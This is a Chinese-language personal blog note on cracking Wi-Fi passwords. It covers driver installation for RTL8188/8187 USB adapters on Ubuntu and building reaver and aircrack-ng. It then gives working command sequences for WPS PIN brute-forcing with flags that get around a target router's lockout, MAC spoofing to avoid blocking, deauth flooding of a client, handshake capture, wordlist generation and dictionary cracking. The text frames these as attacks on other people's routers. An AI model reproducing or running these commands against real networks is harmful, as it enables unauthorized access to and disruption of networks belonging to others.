Wifi密码破解(rtl8818linux驱动安装)

个人环境:

XP上运行的virtulbox ubuntu12.04版本:

参考文档:

http://www.2cto.com/Article/201212/180203.html


备注:

(rtl8818驱动虽然在ubuntu上安装成功了,但是由于aircrack-ng 不兼容这款芯片,最终还是要以最为推荐的8178的芯片,华硕的awus036h型号进行破解实验);

http://www.aircrack-ng.org/doku.php?id=compatibility_drivers

Realtek RTL8187L Chipset Comments

Cards containing the Realtek RTL8187L chipset work quite well and is recommended. The driver patch for this chipset has been continuously improved and quite good at this point in time. The Alfa AWUS036H is a very popular card with this chipset and it performs well the aircrack-ng suite. This chipset is not to be confused with the RTL8187B, which is nowhere near as tested as RTL8187L.


1、需要工具:reaver
原理:穷举PIN码以攻破无线路由器的安全防护
安装:
 下载源码
从这个网址下载reaver源代码https://github.com/sammaple/reaver-wps
 
 
2、解压、安装必要的软件依赖库和工具
在您编译reaver前需要先安装pcaplib等工具,后面还需要aircrack-ng
sudo  apt-get install libpcap-dev  libsqlite3-dev libpcap0.8-dev libssl-dev iw sqlite3 libssl0.9.8

(pcap 和dqlite一定要安装,不然config的时候都包pcap library缺失,还有ssl头文件缺失)
 http://cyruslab.net/2012/02/19/compiling-reaver-wps-error-pcap-library-not-found/

http://blog.csdn.net/xxxxxx91116/article/details/7927520


3、编译和安装
 
配置和编译Reaver
 
cd  reaver-1.4
cd  src
./configure
make

sudo make install


下载aircrack-ng源代码并编译
从Ubuntu12.04版本开始aircrack-ng不再被包含在版本软件仓库中,不过我们可以从网上下载它的源代码进行编译安装。

https://github.com/sammaple/aircrack-ng

如果aircrack-ng已经存在,则不必安装。./configure
make
sudo make install
解压 tar -xzvf reaver-1.4.tar.gz
 

4、USB WIFI准备工作

由于虚拟机中认为笔记本自带的WIFI模组为有线网卡,所以必须要一个USB WIFI网卡才可以。

kali Linux下wifi密码安全测试(1)虚拟机下usb无线网卡的挂载


准备了一个水星的MW150US (RTL8188EU模组),安装扩展包

http://www.cnblogs.com/wangqishu/archive/2012/10/31/2747346.html ,配置USB设备,并加入该USB网卡,启动虚拟机,如果发现在

此时windows弹出virturlbox 驱动的话就是对的了,安装不成功可以多插拔几次安装。

但是还是eth识别,没哟识别成wlan0.


ps:linux 不同的和内核上有不同的版本rtl8818eu驱动,本机的内核环境是:3.11.0-15-generic

更新内核
apt-get install build-essential
sudo apt-get install linux-headers-$(uname -r)

按照此安装成功 https://github.com/lwfinger/rtl8188eu

以下废弃:

按照以下步骤,进行ubuntu12.04上的rtl8188eu驱动安装,下载地址:http://pan.baidu.com/s/1bnxpam7

http://www.9170.org/post-487.html

http://dxhisboy.blog.163.com/blog/static/2096440982013218101444895/

编译错误解决:

error: implicit declaration of function ‘daemonize’ [-Werror=implicit-function-declaration]

这个问题是由于 3.5.x 以上内核去掉了 daemonize 这个函数, 导致无法顺利编译( 当然这是查了N多资料, 搜索了对应的头文件 ),
解决方法很简单, 删掉它就可以了。


4、关于使用8188 适配 airmon的疑问,好像是不支持的。

http://forum.aircrack-ng.org/index.php?topic=389.0


iwconfig 只查看wireless网卡

iwlist wlan0 scan 查看wlan0并进行扫描


http://www.aircrack-ng.org/doku.php?id=Main


一个经典的进行crack的文章:

http://linux.cn/article-2335-1.html

http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver


8187驱动安装:(airmon-ng 官网给出的是2.6内核的驱动,RTL官网还有3.0以上的驱动)

http://www.realtek.com.tw/downloads/searchView.aspx?keyword=rtl8187

http://www.kalilinux.net/community/threads/problem-with-awus036h.174/


I am having the same issue as well. I can use my Alpha AWUS036H in BT5r3 without ever installing a driver.


禁止特殊的驱动方法,blacklist some drivers

If you need to use the USB instead of the internal device, I suggest you blacklist the driver for the internal device. That will allow you to keep the switch on and use the USB. It has a working driver, rtl8187 and has created an interface wlan1.

Find out the driver for the internal with:

sudo lshw -C network

Find the part that refers to 'driver=' associated with wlan0, the internal. Then blacklist it:

sudo su
echo "blacklist <some_driver>" >> /etc/modprobe.d/blacklist.conf
exit

破解参考文章 kaili linux

http://xiao106347.blog.163.com/blog/static/2159920782013523143959/


crunch 10 10 46789 -o jhy.txt


http://www.eeboard.com/bbs/thread-13491-1-1.html


reaver -i mon0  -b 00:01:02:03:04:05 -vv -S -N -L -d 60 -r 3:15 -T .5 -x 360

macchanger -r wlan1

这表示把wlan1 改成随机的MAC,这样就不担心路由器的封锁。

其次,使用 -vv 看看有没有出错,例如我发现我的就一直提示:

[!] WPS transaction failed (code: 0x03), re-trying last pin
或者
[!] WPS transaction failed (code: 0x02), re-trying last pin


这或许因为对方路由器限定了PIN的次数,过于频繁就会拒绝我们的探测,因此我们修改一下参数:

reaver -i mon0  -b 00:01:02:03:04:05 -vv -S -N -L -d 60 -r 3:15 -T .5 -x 360

好吧,这下参数变长了好多,其实很简单:

-L 就是忽略路由锁定

-d 60 就是发一次等1分钟,降低我们的探测频率,这相当有用,尽管速度降了下来但是更精准了。

-r 3:15是一个PIN失败后尝试3次,每次间隔15秒。

-T .5 默认是 0.1 ,这是说多久没有收到无线路由的回馈算PIN失败。改大一点可以弥补信号冲突、衰减造成的延迟大的问题。

-x 360 ,当同PIN10次失败后,reaver就进入休眠,时间10分钟,这样可以让路由器恢复一下,利于我们继续PIN!!


这样一来,就不再提示错误了,偶尔也会有一两个,但是因为可以重试所以准确率提高。


wpa2 crack


如果无线网卡没有正常工作,输入airmon-ng wlan0 up加载无线网卡;之后输入airmon-ng start wlan0激活网卡到监听模式monitor(如下图):


airodump-ng mon0

 

if target more ,you will then use airodump-ng mon0 --bssid or --essid to get client mac address


1 继续输入airodump-ng --ivs -w abc -c 6 mon0 开始抓包!
  #--ivs是通过ivs过滤,只保留可以破解密码的报文.ivs文件,这样比较快点;-w是将抓取的报文写入命名为abc并保存(之后会在当前文件夹保存为abc-01.ivs);-c后面跟频道,如这里的6 。


2 目标主机进行deauth攻击,以加速抓包!命令格式aireplay-ng -0 大小 -a 目标主机mac -c 客户端 mac mon0 --deauth 10000


本例中的为 aireplay-ng -o 10 -a  A8:15:4D:0F:C5:E8 -c  B0:AA:36:18:E5:E5 mon0 --deauth 10000

in  airodump-ng mon0 --bssid or --essid,you 'll see   client B0:AA:36:18:E5:E5 frames increase quickly!

3 aircrack-ng -w passwd.txt abc.cap/abc.ivs  ---crack by ivs files,normorlly need more lager ivs files the more quick & right


if you found result is as blow, then just wait someone to use this essid!

Opening abc-01.ivs
Got no data packets from target network!


Quitting aircrack-ng...


5、WPS crack 使用(未完待验证)

方法:
1 输入:airmon-ng start wlan0 开启监听模式 (屏幕显示 加载8187L驱动成功–一次就加载成功啊!)
2 输入:wash -i mon0 -C 查看所有开启WPS的无线路由 长时间无反应按Ctrl+C,结束进程,这时记下你要PJ的目标路由MAC.
3 输入:airodump-ng mon0 网卡以混杂模式扫描所有频道—并显示所有AP的信息(包括 AP的信号强度,ESSID,MAC,频道,加密方式,等等…..),按Ctrl+C,结束扫描.
注:如果你已知对方无线路由信息 第2,第3步 可省略!
4 输入:reaver -i mon0 -b MAC -a -S -vv 开始穷举pin码
注:随时可以按CTRL+C退出保存进程,下次按下光标控制键“上”键然后回车,进程可继续。
实战我输入了reaver -i mon0 -b MACD8:5D:4C:37:78:F6 -a -S -vv -d 0 ( 多加了 -d 0 加快速度 ),只见屏幕飞闪……爽啊!

你可能感兴趣的:(wifi)